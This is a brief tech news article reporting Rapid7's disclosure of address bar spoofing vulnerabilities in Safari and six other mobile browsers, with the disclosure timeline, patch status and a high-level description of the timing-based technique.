Safari Among Seven Mobile Browsers Affected by Address Bar Spoofing Vulnerabilities

0
67
Safari

INTRO: Researchers at the cyber-security firm, Rapid7, have claimed that several popular mobile browsers are susceptible to ten new ‘Address Bar Spoofing’ vulnerabilities, thereby jeopardizing the privacy and digital security of their users. According to the report, the affected browsers include Safari, Opera Touch, Opera Mini, Bilt, RITS, UC Browser and Yandex Browser.

The issues were discovered earlier this year by Rapid7 researchers in association with Pakistani cyber-security analyst, Rafay Baloch, and were reported to the respective developers in August. While Apple has since released a fix for Safari, Opera says it’ll roll out a patch on Veterans’ Day . The rest of the developers are said to have either ignored the warnings or failed to follow-up after an initial response.

Seven mobile browsers vulnerable to address bar spoofing attacks | ZDNet

While address bar spoofing has existed since the early days of the world wide web, most desktop browsers have added several layers pf protection over the years to prevent websites from hiding their true identity from visitors. However, thanks to the space constraint on mobile devices, some of the security checks for spoofing cannot be easily accommodated on mobile devices, making them many times more vulnerable to such attacks.

Explaining how address bar spoofing work, the researchers said that “Exploitation all comes right down to , ‘Javascript shenanigans’”. According to Rapid7’s Research Director, Tod Beardsley, “By messing with the timing between page loads and when the browser gets a chance to refresh the address bar, an attacker can cause either a pop-up to appear to come from an arbitrary website or can render content in the browser window that falsely appears to come from an arbitrary website”.

You can learn more technical details about the findings on Baloch’s website or the Rapid7 blog.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.